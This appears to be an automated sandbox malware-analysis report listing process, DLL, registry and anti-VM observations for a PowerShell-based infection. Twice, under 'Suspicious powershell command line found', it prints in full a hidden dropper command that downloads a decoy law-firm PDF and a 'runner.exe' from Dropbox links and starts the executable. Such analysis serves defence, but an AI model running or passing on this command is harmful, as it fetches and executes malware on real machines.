Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb*~yq/ source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb.} source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1918892718.0000023965CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdby~mq source: powershell.exe, 00000002.00000002.1919183779.0000023965CE3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1918892718.0000023965CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1921709834.0000023965E2F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1919183779.0000023965D07000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_00007FFD9B9455FE push cs; iretd

2_2_00007FFD9B94561F

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3413			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6432			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372	Thread sleep count: 3413 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep count: 6432 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7740	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapterX
Source: svchost.exe, 00000004.00000002.2921562506.000001FA5182B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWy
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapterX
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
